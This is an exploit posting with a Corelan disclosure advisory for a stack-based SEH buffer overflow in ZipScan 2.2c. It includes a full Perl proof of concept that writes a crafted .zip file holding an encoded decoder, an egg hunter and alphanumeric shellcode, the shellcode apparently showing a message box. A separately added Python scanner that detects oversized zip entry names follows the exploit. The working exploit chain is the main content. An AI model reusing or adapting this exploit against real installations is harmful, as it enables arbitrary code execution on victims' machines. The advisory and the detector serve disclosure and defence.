ZipScan 2.2c Buffer Overflow

Posted Apr 6, 2010
Authored by corelanc0d3r, Lincoln

ZipScan version 2.2c buffer overflow exploit that creates a malicious .zip file.

tags | exploit, overflow
SHA-256 | 1ceca7cff059a32bb8f47a5ede4b7d904ae8a6fab410175e36f81eadad238be9


|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| security@corelan.be |
| |
|-------------------------------------------------[ EIP Hunters ]--|
| |
| Vulnerability Disclosure Report |
| |
|------------------------------------------------------------------|

Advisory : CORELAN-10-020
Disclosure date : April 3rd, 2010
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-020


00 : Vulnerability information
-------------------------------------
Product : ZipScan 2.2c
Version : 2.2c (latest version)
Vendor : contact@foobarsoftware.com / http://www.zipscan.co.uk/
URL : http://www.zipscan.co.uk/download.htm
Platform : Windows
Type of vulnerability : Stack overflow
Risk rating : medium
Issue fixed in version : not fixed
Vulnerability discovered by : Lincoln
Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/


01 : Vendor description of software
-------------------------------------
From the vendor website:
"ZipScan searches archive files. It can search Zip, CAB, RAR, ACE,
InstallShield CAB, JAR, TAR, GZIP, Z, ZOO, LZH, ARJ, CHM and
OpenOffice files, including password-protected, nested and
self-extracting archives. The program supports text searching and can
open and extract files."

02 : Vulnerability details
-------------------------------------
When a specially crafted zip file is opened from within ZipScan, a
structured exception handler record on the stack is overwritten,
which allows arbitrary code execution.
Ways to trigger the vulnerability:

- open the zip file from within ZipScan: "File - Open Archive File"
Or
- click "open archive file and view its contents", then
- double-click on the filename inside the zip file


03 : Author/Vendor communication
-------------------------------------
March 23 2010 : author contacted
March 20 2010 : sent reminder
April 3 2010 : No response, public disclosure


04 : PoC
----------
#!/usr/bin/perl
# Software : ZipScan 2.2c (.zip)
# Bug found by : Lincoln
# Author : Lincoln & corelanc0d3r
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Code :
print "|------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";
print "| |\n";
print "| http://www.corelan.be:8800 |\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] Exploit for ZipScan 2.2c \n";



my $filename="zipscan.zip";
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\x88\x13" .# file size: 5k
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x88\x13". # file size: 5k
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\xb6\x13\x00\x00". # +46
"\xa6\x13\x00\x00". # +30
"\x00\x00";

my $decoder =
#pop edx pop esp
"\x5b\x5b\x5b\x5b\x5c".

#jmp ebp
"\x25\x4A\x4D\x4E\x55".
"\x25\x35\x32\x31\x2A".
"\x2d\x55\x55\x55\x64".
"\x2d\x55\x55\x55\x64".
"\x2d\x56\x55\x56\x51".
"\x50".

#add ebp, 526h
"\x25\x4A\x4D\x4E\x55".
"\x25\x35\x32\x31\x2A".
"\x2d\x35\x69\x48\x54".
"\x2d\x25\x69\x48\x54".
"\x2d\x25\x68\x48\x52".
"\x50".

#jmp back to decoded op code
"\x7a\xb5";

#basereg ebp, modified egg hunter mov edx,ebp
#points egg hunter to unmodified shellcode
my $egg =
"UYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0".
"BBABXP8ABuJIOyJB2bPRPjs2shZmfNwLWuSj44ho".
"nXRWdpVPqdNkXznOrUZJNO45jGKOxgA";

#msg box "Exploited by Corelan Security Team"
#encoded with Alpha2 base reg edi
my $shellcode =
"w00tw00t".
"WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0B".
"BABXP8ABuJIoy8c9JkgXYt3jTsiQYg9syQYqYbiRiW".
"9g9QYBiCsrc0CqSssssvW3aqJqzQQV8BpVPqQ4p712".
"KQQsqv1drBabbP2QRcrTprbw2RaSrpXrpTx2a72RU0".
"JCyPJrYSzpKPMrkRk59V1qtSuptQZaD75QqRnP2Rnb".
"rBbQJQVPQ3yV9pBaTPN2Ksa3Q74bPBl0KQSw6BdPLP".
"NBK3rsfqW0lrlpKBqQFQTpHBlRkpQPnbeppBn2Ksua".
"vrpWHRpBoswQxPPPuPLTsBpRy1UPQPKQq0KropH51p".
"QRPPL2kPPPlQVrd0E44pL2kCaruqWpLBlpKpPcd0Cd".
"uPPRXPCFQpKaJ0LPK2b2JpGSXPNRKw3BJW7Rpsucar".
"jpKQX53QVf7bpw9BnbKW4PtBlRkw5pQQZ0NBd410I0".
"orpDqBkppbkPLBnblpOSDPKRPQSpDqV0jaZCQrjBOq".
"T0M3wqarkSGcxPi3zPQrkPOPIrOG9ROSurKpCrlqUS".
"D3aUhrqau1Yrn0NPkpB1jsu0tRerq0JpKssqF2nBK3".
"vPlSr2K2lpKssSZPEpLPC6QSzbkPNPkW5qDRnRKqW4".
"1RmwHRosISabtcv74rgbLG5fQBj2C0Og2QT1XbfBiW".
"8sdpOpy2kQEpMv9CyrrpPbHpLpN0PRnQTpN3xRLRp2".
"rpKrxpM2lpKBoqYpoPKPO2oQiv1seG6QtpMpkF1PnS".
"yQX0MtrpQrC2lpGsu0LPD54sag2pMtxPNBKw9ROBiR".
"OPK0OPLRiqRsUQWBXG32x1RPL2pPl0EPppKpOrqPxQ".
"Ww3Suu2sv2nreVT3u4xV1REPQqspEp50D6RRmChV1p".
"LaT2D2dczBlSyaXcVQSbFpKroSsqu3v3TblCy2k0rp".
"PpPpMbKPN78rlarv0pMpMplpNpgQWpl3w2t2fVRpKs".
"hpC2NpIPoPIpoRiPoCraXPQrTqURQpQpHpEPp73PXQ".
"T4pQS77aRRnw2G5CtPq0K0kPKGHqSplSuBTaVu6pK0".
"9QXRCpE6X2p51G2PMv0shG5Pprqt8QRsiqUbPRpSdp".
"QRUbqrXQTVU1S3rrpPiPQU4PCv8savPQS2Cg5Ue3sC".
"cV1t8qRW5PBPL0PsQRp0nrbcxpQDpSaPSRp2OPPRRQ".
"UUhpCpTv1dpbp2B73W9PQPx3rpOpCQIsr2tBppeF1b".
"XSrpepQu872pPV0BLW6saQXCyRnaxBpPLbf74PEPr0".
"MCi0IBQqTt1pJprqSrBCsSSRp0QQVp2pKRo1X0PRpt".
"qpOVPPF6PbkPObqPECtsxSuRzQQ1QA";

#Filler
my $mjunk = "A" x 30;

# --- payload --- 5k total
my $junk = "A" x 22 . $egg . "A" x 3427;
my $nseh="\x7a\x06\x41\x41";
my $seh="\x16\x09\x01\x10"; #universal
my $payload = $junk.$nseh.$seh.$decoder.$shellcode.$mjunk;
$payload = $payload . ".txt";

print "[+] Size : " . length($payload)."\n";
system("del $filename");
print "[+] Creating new vulnerable file: $filename\n\n";
open(FILE, ">$filename") or die "[-] Cannot create $filename: $!\n";
binmode(FILE); # raw bytes: no newline translation on Windows
print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close(FILE);
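A defender-side check, added here and not part of the advisory or its PoC: the archive the PoC writes is a single zero-length member whose name field carries the 5000-byte (0x1388) payload, so a gateway or mail scanner can flag it structurally. The function below walks the central directory from the end-of-central-directory record by hand (not via a lenient library parser) and reports any entry whose name length exceeds a threshold; the 260-byte limit and the two sample archives are constructed for this example.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"
CDH_SIG = b"PK\x01\x02"
MAX_SANE_NAME = 260  # hypothetical threshold; real names are nowhere near 5000 bytes


def central_directory_names(data: bytes):
    """Yield (name_length, name_bytes) for every central directory entry."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    # EOCD: disk, cd_disk, entries_on_disk, entries_total, cd_size, cd_offset, comment_len
    _, _, _, entries, _cd_size, cd_offset, _ = struct.unpack_from("<HHHHIIH", data, eocd + 4)
    pos = cd_offset
    for _ in range(entries):
        if data[pos:pos + 4] != CDH_SIG:
            raise ValueError("bad central directory header at %#x" % pos)
        # CDH after the signature: ver_made, ver_need, flags, method, time, date, crc,
        # csize, usize, name_len, extra_len, comment_len, disk, int_attr, ext_attr, lfh_offset
        f = struct.unpack_from("<HHHHHHIIIHHHHHII", data, pos + 4)
        name_len, extra_len, comment_len = f[9], f[10], f[11]
        yield name_len, data[pos + 46:pos + 46 + name_len]
        pos += 46 + name_len + extra_len + comment_len


def suspicious_entries(data: bytes, limit: int = MAX_SANE_NAME):
    """Entries whose name length exceeds the limit, as (length, first 16 name bytes)."""
    return [(n, name[:16]) for n, name in central_directory_names(data) if n > limit]


def build_benign() -> bytes:
    """Constructed sample: an ordinary one-member archive written by zipfile."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "hello")
    return buf.getvalue()


def build_overlong_name(name: bytes) -> bytes:
    """Constructed sample with the PoC's layout: local header + name, central header + name, EOCD.
    The member is empty; only the name field is oversized (no payload, just the given bytes)."""
    lfh = b"PK\x03\x04" + struct.pack("<HHHHHIIIHH", 20, 0, 0, 0, 0, 0, 0, 0, len(name), 0)
    cdh = b"PK\x01\x02" + struct.pack("<HHHHHHIIIHHHHHII", 20, 20, 0, 0, 0, 0, 0, 0, 0,
                                       len(name), 0, 0, 0, 1, 0x24, 0)
    eocd = b"PK\x05\x06" + struct.pack("<HHHHIIH", 0, 0, 1, 1, len(cdh) + len(name),
                                        len(lfh) + len(name), 0)
    return lfh + name + cdh + name + eocd
```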